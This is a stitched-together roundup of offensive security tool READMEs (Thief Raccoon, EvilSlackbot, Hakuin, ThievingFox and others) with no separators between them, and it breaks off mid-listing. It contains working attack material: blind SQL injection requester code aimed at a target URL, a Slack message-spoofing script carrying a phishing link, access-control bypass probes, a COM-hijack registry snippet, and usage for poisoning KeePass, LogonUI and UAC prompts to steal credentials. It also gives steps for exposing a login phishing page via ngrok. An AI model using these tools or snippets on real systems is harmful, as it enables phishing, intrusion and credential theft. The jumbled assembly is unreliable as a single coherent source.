Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.
```bash
git clone https://github.com/davenisc/thief_raccoon.git
cd thief_raccoon
```

Install the venv module:

```bash
apt install python3.11-venv
```

Create and activate the virtual environment:

```bash
python -m venv raccoon_venv
source raccoon_venv/bin/activate
```

Install the Python dependencies:

```bash
pip install -r requirements.txt
```
Usage
```bash
python app.py
```
After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.
If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.
If you want to make the phishing page accessible over the internet, use ngrok.
Using ngrok
Download ngrok from ngrok.com and follow the installation instructions for your operating system.
Expose your local server to the internet:
Get the public URL:
After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.
How to install Ngrok on Linux?
```bash
curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
  | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
  && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \
  | sudo tee /etc/apt/sources.list.d/ngrok.list \
  && sudo apt update \
  && sudo apt install ngrok
```
```bash
ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx
```
Deploy your app online
Put your app online at an ephemeral domain forwarding to your upstream service. For example, if the app is listening on http://localhost:5000, run:
```bash
ngrok http http://localhost:5000
```
Example
```bash
python app.py
```
```bash
Select the operating system for phishing:
1. Windows 10
2. Windows 11
3. Windows XP
4. Windows Server
5. Ubuntu
6. Ubuntu Server
7. macOS
Enter the number of your choice: 2
```
Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.
Disclaimer
This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.
License
This project is licensed under the MIT License. See the LICENSE file for details.
Screenshots
Credits
Developer: @davenisc
Web: https://davenisc.com
ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.
- <binary>: Path to the binary file for analysis.
- -s, --search SEARCH: Optional. Search for specific instruction patterns.
- -f, --functions: Optional. Print function names and addresses.

Example usage:

python3 ropdump.py /path/to/binary
python3 ropdump.py /path/to/binary -s "pop eax"
python3 ropdump.py /path/to/binary -f
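For a feel of what gadget discovery involves, here is a conceptual sketch using the Capstone disassembler (this is only an illustration of the core idea, not ROPDump's actual implementation): scan a code buffer for `ret` opcodes and disassemble the bytes preceding each one into candidate gadgets.

```python
# Conceptual ROP-gadget search with Capstone (not ROPDump's actual code):
# find `ret` opcodes and disassemble the preceding bytes into gadgets.
from capstone import Cs, CS_ARCH_X86, CS_MODE_64

def find_gadgets(code: bytes, base_addr: int, max_len: int = 5):
    md = Cs(CS_ARCH_X86, CS_MODE_64)
    gadgets = []
    for i, byte in enumerate(code):
        if byte != 0xC3:  # x86 `ret`
            continue
        for start in range(max(0, i - max_len), i + 1):
            insns = list(md.disasm(code[start:i + 1], base_addr + start))
            # keep only sequences that decode cleanly and end exactly at `ret`
            if insns and insns[-1].mnemonic == 'ret' \
                    and sum(x.size for x in insns) == i + 1 - start:
                text = '; '.join(f'{x.mnemonic} {x.op_str}'.strip() for x in insns)
                gadgets.append((hex(base_addr + start), text))
    return gadgets

# b'\x5f\xc3' is `pop rdi; ret`
print(find_gadgets(bytes.fromhex('5fc3'), 0x400000))
```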
A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.
This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.
Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually granted permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an API token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, and files, and to search for secrets leaked in Slack.
In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (links, files, spoofed messages).
EvilSlackbot requires Python 3 and the slackclient library:
pip3 install slackclient
usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
[-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]
options:
-h, --help show this help message and exit
Required:
-t TOKEN, --token TOKEN
Slack Oauth token
Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc
(Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token
(Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f
and -e,-eL, or -cH)
Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL
Email of target
-cH CHANNEL, --channel CHANNEL
Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST
Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks
associated with your provided token.
-o OUTFILE, --outfile OUTFILE
Outfile to store search results
-cL, --channel_list List all public Slack channels
To use this tool, you must provide an xoxb or xoxp token.
Required:
-t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
python3 EvilSlackbot.py -t <token>
Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.
Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)
With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the bot name and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to look up the Slack ID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails. A minimal sketch of what this flow looks like against the Slack API follows the examples below.
python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>
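Under the hood, this kind of spoofing maps onto Slack's chat.postMessage API with the username and icon_url overrides. A minimal sketch with the slackclient package (placeholder token, email, and display name; this is not EvilSlackbot's code):

```python
# Minimal spoofed-message sketch using the slackclient package.
# Token, email, and display name are placeholders; not EvilSlackbot's code.
from slack import WebClient

client = WebClient(token='xoxb-your-token-here')

# Resolve the target's Slack ID from their email (needs users:read.email scope)
user = client.users_lookupByEmail(email='target@example.com')
channel_id = user['user']['id']

# chat.postMessage accepts username/icon_url overrides
# (needs the chat:write.customize scope)
client.chat_postMessage(
    channel=channel_id,
    text='Please re-authenticate: https://phish.example.com',
    username='IT Support',
    icon_url='https://example.com/it-support.png',
)
```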
With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to look up the Slack ID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>
With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires an xoxp token, as xoxb tokens cannot be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.
python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>
With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to look up the Slack ID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>
Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL Email of target
-cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks associated with your provided token.
-o OUTFILE, --outfile OUTFILE Outfile to store search results
-cL, --channel_list List all public Slack channels
With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.
python3 EvilSlackbot.py -t <xoxb token> -cL
Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.
WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office use at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; these ultimately allow an attacker to reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (outdated).
The author does not encourage or support using Pyrit for the infringement of peoples' communication privacy. The exploration and realization of the technology discussed here are a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft' licensing.
Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms, including FreeBSD, MacOS X and Linux as operating systems, and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc processors.
Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
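Concretely, the PMK derivation that Pyrit pre-computes is standard PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, and a 256-bit output:

```python
# WPA/WPA2-PSK master-key derivation: PBKDF2-HMAC-SHA1, SSID as salt,
# 4096 iterations, 256-bit key; this is the computation Pyrit pre-computes.
import hashlib

def pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac('sha1', passphrase.encode(), ssid.encode(), 4096, 32)

print(pmk('password123', 'MyHomeWiFi').hex())
```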
Multiple computational nodes can access a single storage server in various ways provided by Pyrit.
See CHANGELOG file for a better description.
Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.
You may want to read this wiki entry if interested in porting Pyrit to a new hardware platform. For contributions or bug reports, please submit an Issue at https://github.com/JPaulMora/Pyrit/issues.
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
Hakuin has been presented at esteemed academic and industrial conferences:
- BlackHat MEA, Riyadh, 2023
- Hack in the Box, Phuket, 2023
- IEEE S&P Workshop on Offensive Technology (WOOT), 2023
More information can be found in our paper and slides.
To install Hakuin, simply run:
pip3 install hakuin
Developers should install the package locally and set the -e flag for editable mode:
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from Requester and override the request method. The method must determine whether the query resolved to True or False.
```python
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        url = f'http://vuln.com/?n=XXX" OR ({query}) --'
        async with aiohttp.ClientSession() as session:
            async with session.get(url) as r:
                return r.status == 200

class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        async with aiohttp.ClientSession() as session:
            async with session.get('http://vuln.com/', headers=headers) as r:
                return 'found' in await r.text()
```
To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.
```python
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
    ...

async def main():
    # requester: Use this Requester
    # dbms: Use this DBMS
    # n_tasks: Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())
```
Now that everything is set, you can start extracting DB metadata.
```python
# strategy:
#   'binary': Use binary search
#   'model':  Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
tables = await ext.extract_table_names(strategy='model')
columns = await ext.extract_column_names(table='users', strategy='model')
metadata = await ext.extract_meta(strategy='model')
```
Once you know the structure, you can extract the actual content.
```python
# text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')

# strategy:
#   'binary':   Use binary search
#   'fivegram': Use five-gram model
#   'unigram':  Use unigram model
#   'dynamic':  Dynamically identify the best strategy. This setting
#               also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
res = await ext.extract_column_int(table='users', column='id')
res = await ext.extract_column_float(table='products', column='price')
res = await ext.extract_column_blob(table='users', column='id')
```
More examples can be found in the tests directory.

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
python3 hk.py -h
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
The original 403fuzzer.py :)
Fuzz 401/403ing endpoints for bypasses
This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACLs or URL validation.
It will output the response codes and length for each request, in a nicely organized, color-coded way so things are readable.
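To give a sense of the categories of probes involved (a simplified sketch with the requests library; these are common public bypass techniques, not the tool's actual payload lists):

```python
# Simplified sketch of common 401/403 bypass probes (not bypassfuzzer's actual
# payload lists): header tricks, path-normalization variants, and verb changes.
import requests

url = 'https://example.com/forbidden'
header_probes = [
    {'X-Forwarded-For': '127.0.0.1'},
    {'X-Original-URL': '/forbidden'},
    {'X-Rewrite-URL': '/forbidden'},
]
path_probes = ['/forbidden/.', '//forbidden//', '/%2e/forbidden', '/forbidden%20']
verbs = ['GET', 'POST', 'PUT', 'TRACE']

for h in header_probes:
    r = requests.get(url, headers=h)
    print(r.status_code, len(r.content), h)

for p in path_probes:
    r = requests.get('https://example.com' + p)
    print(r.status_code, len(r.content), p)

for v in verbs:
    r = requests.request(v, url)
    print(r.status_code, len(r.content), v)
```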
I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.
You can now feed it raw HTTP requests that you save to a file from Burp.
usage: bypassfuzzer.py -h
Simply paste the request into a file and run the script!
- It will parse and use cookies & headers from the request.
- Easiest way to authenticate for your requests.
python3 bypassfuzzer.py -r request.txt
Specify a URL
python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html
Specify cookies to use in requests:
some examples:
--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"
Specify a method/verb and body data to send
bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"
Specify custom headers to use with every request. Maybe you need to add some kind of auth header like Authorization: bearer <token>.

Specify -H "header: value" for each additional header you'd like to add:
bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"
Based on response code and length. If it sees a response 8 times or more it will automatically mute it.
Repeats are changeable in the code until I add an option to specify it in a flag.

NOTE: Can't be used simultaneously with -hc or -hl (yet)
# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart
Useful if you wanna proxy through Burp
bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080
# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers
# Skip sending path normalization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls
Provide comma delimited lists without spaces. Examples:
# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400
# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638
SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
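The overall approach can be sketched in a few lines (a conceptual illustration, not SQLMC's actual implementation): crawl links to a fixed depth, inject a quote into parameterized URLs, and look for database error strings in the response.

```python
# Conceptual sketch of SQLMC's approach (not its actual implementation):
# crawl to a fixed depth and probe each parameterized URL with a quote.
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

SQL_ERRORS = ('you have an error in your sql syntax', 'unclosed quotation mark',
              'sqlstate', 'syntax error at or near')

visited = set()

def check_sqli(url: str) -> None:
    if '=' not in url:
        return  # only probe URLs with query parameters
    body = requests.get(url + "'", timeout=10).text.lower()
    if any(err in body for err in SQL_ERRORS):
        print(f'[!] possible SQL injection: {url}')

def crawl(url: str, depth: int) -> None:
    if depth < 0 or url in visited:
        return
    visited.add(url)
    check_sqli(url)
    html = requests.get(url, timeout=10).text
    for a in BeautifulSoup(html, 'html.parser').find_all('a', href=True):
        crawl(urljoin(url, a['href']), depth - 1)

crawl('http://example.com', 2)
```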
```bash
pip3 install sqlmc
```
Run sqlmc with the following command-line arguments:

- -u, --url: The URL to scan (required)
- -d, --depth: The depth to scan (required)
- -o, --output: The output file to save the results

Example usage:
sqlmc -u http://example.com -d 2
Replace http://example.com with the URL you want to scan and 2 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.
The tool will then perform the scan and display the results.
This project is licensed under the GNU Affero General Public License v3.0.
HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. HardeningMeter supports all Linux distributions and machine-readable output: the results can be printed to the screen in a table format or exported to a CSV file. (For more information see the Documentation.md file.)
For example, scan the '/bin/cp' file and the system hardening methods:
python3 HardeningMeter.py -f /bin/cp -s
Before installing HardeningMeter, make sure your machine has the following:
1. The readelf and file commands
2. Python version 3
3. pip
4. tabulate

pip install tabulate
The very latest developments can be obtained via git.
Clone or download the project files (no compilation nor installation is required)
git clone https://github.com/OfriOuzan/HardeningMeter
Specify the files you want to scan; the argument can take more than one file separated by spaces.
Specify the directory you want to scan; the argument takes one directory and scans all ELF files recursively.
Specify whether you want to add external checks (False by default).
Prints, in order, only those files that are missing security hardening mechanisms and need extra attention.
Specify if you want to scan the system hardening methods.
Specify if you want to save the results to csv file (results are printed as a table to stdout by default).
HardeningMeter's results are printed as a table and consist of 3 different states:
- (X): the binary hardening mechanism is disabled.
- (V): the binary hardening mechanism is enabled.
- (-): the binary hardening mechanism is not relevant in this particular case.
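For a feel of how such checks work under the hood, here is a rough sketch based on parsing readelf output (not HardeningMeter's actual code):

```python
# Rough sketch of readelf-based hardening checks (not HardeningMeter's code).
import subprocess

def readelf(flag: str, path: str) -> str:
    return subprocess.run(['readelf', flag, path],
                          capture_output=True, text=True).stdout

binary = '/bin/cp'
symbols = readelf('--dyn-syms', binary)        # dynamic symbol table
segments = readelf('--program-headers', binary)
header = readelf('--file-header', binary)

print('Stack Canary:', 'V' if '__stack_chk' in symbols else 'X')
print('RELRO       :', 'V' if 'GNU_RELRO' in segments else 'X')
print('PIE         :', 'V' if 'DYN' in header else 'X')
```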
When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.
ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.
The accompanying blog post can be found here
Rustup must be installed; follow the instructions available here: https://rustup.rs/
The mingw-w64 package must be installed. On Debian, this can be done using:
apt install mingw-w64
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu
Mono and Nuget must also be installed; instructions are available here: https://www.mono-project.com/download/stable/#download-lin
After adding the Mono repositories, Nuget can be installed using apt:
apt install nuget
Finally, Python dependencies must be installed:
pip install -r client/requirements.txt
ThievingFox works with Python >= 3.11.
Rustup must be installed; follow the instructions available here: https://rustup.rs/
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc
.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"
Finally, Python dependencies must be installed:

pip install -r client/requirements.txt

ThievingFox works with Python >= 3.11.
NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell).
All modules have been tested on the following Windows versions:

| Windows Version |
|---|
| Windows Server 2022 |
| Windows Server 2019 |
| Windows Server 2016 |
| Windows Server 2012R2 |
| Windows 10 |
| Windows 11 |
[!CAUTION] Modules have not been tested on other versions, and are expected to not work.
| Application | Injection Method |
|---|---|
| KeePass.exe | AppDomainManager Injection |
| KeePassXC.exe | DLL Proxying |
| LogonUI.exe (Windows Login Screen) | COM Hijacking |
| consent.exe (Windows UAC Popup) | COM Hijacking |
| mstsc.exe (Windows default RDP client) | COM Hijacking |
| RDCMan.exe (Sysinternals' RDP client) | COM Hijacking |
| MobaXTerm.exe (3rd party RDP client) | COM Hijacking |
[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.
ThievingFox contains 3 main modules: poison, cleanup and collect.
For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the server, and modifies the registry if needed to perform COM hijacking.
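Conceptually, the per-user COM hijack boils down to planting an InProcServer32 value under HKCU that shadows the legitimate HKLM registration. An illustrative sketch with a placeholder CLSID and DLL path (this is not ThievingFox's code):

```python
# Conceptual HKCU COM hijack (placeholder CLSID and DLL path; not
# ThievingFox's code). When the target application instantiates this COM
# class, the per-user registry entry resolves before the HKLM one, so the
# planted DLL is loaded instead of the legitimate library.
import winreg

clsid = '{00000000-0000-0000-0000-000000000000}'  # placeholder CLSID
key_path = rf'Software\Classes\CLSID\{clsid}\InProcServer32'

with winreg.CreateKey(winreg.HKEY_CURRENT_USER, key_path) as key:
    # default value: path of the DLL the COM runtime will load
    winreg.SetValueEx(key, None, 0, winreg.REG_SZ,
                      r'C:\Windows\Temp\ThievingFox\hook.dll')
    winreg.SetValueEx(key, 'ThreadingModel', 0, winreg.REG_SZ, 'Both')
```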
To speed up the compilation of all libraries, a cache is maintained in client/cache/.
--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only currently logged-in users are impacted (all users that have an HKCU hive).
--keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.
The KeePass module requires the Visual C++ Redistributable to be installed on the target.
Multiple applications can be specified at once, or the --all flag can be used to target all applications.
[!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.
$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications
For each application specified in the command line parameters, the cleanup module first removes poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.
For applications that support poisoning of both HKCU and HKCR hives, both are cleaned up regardless.
Multiple applications can be specified at once, or the --all flag can be used to cleanup all applications.
It does not clean extracted credentials on the remote host.
[!IMPORTANT] If the targeted application is in use while the cleanup module is run, the DLLs that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.
$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
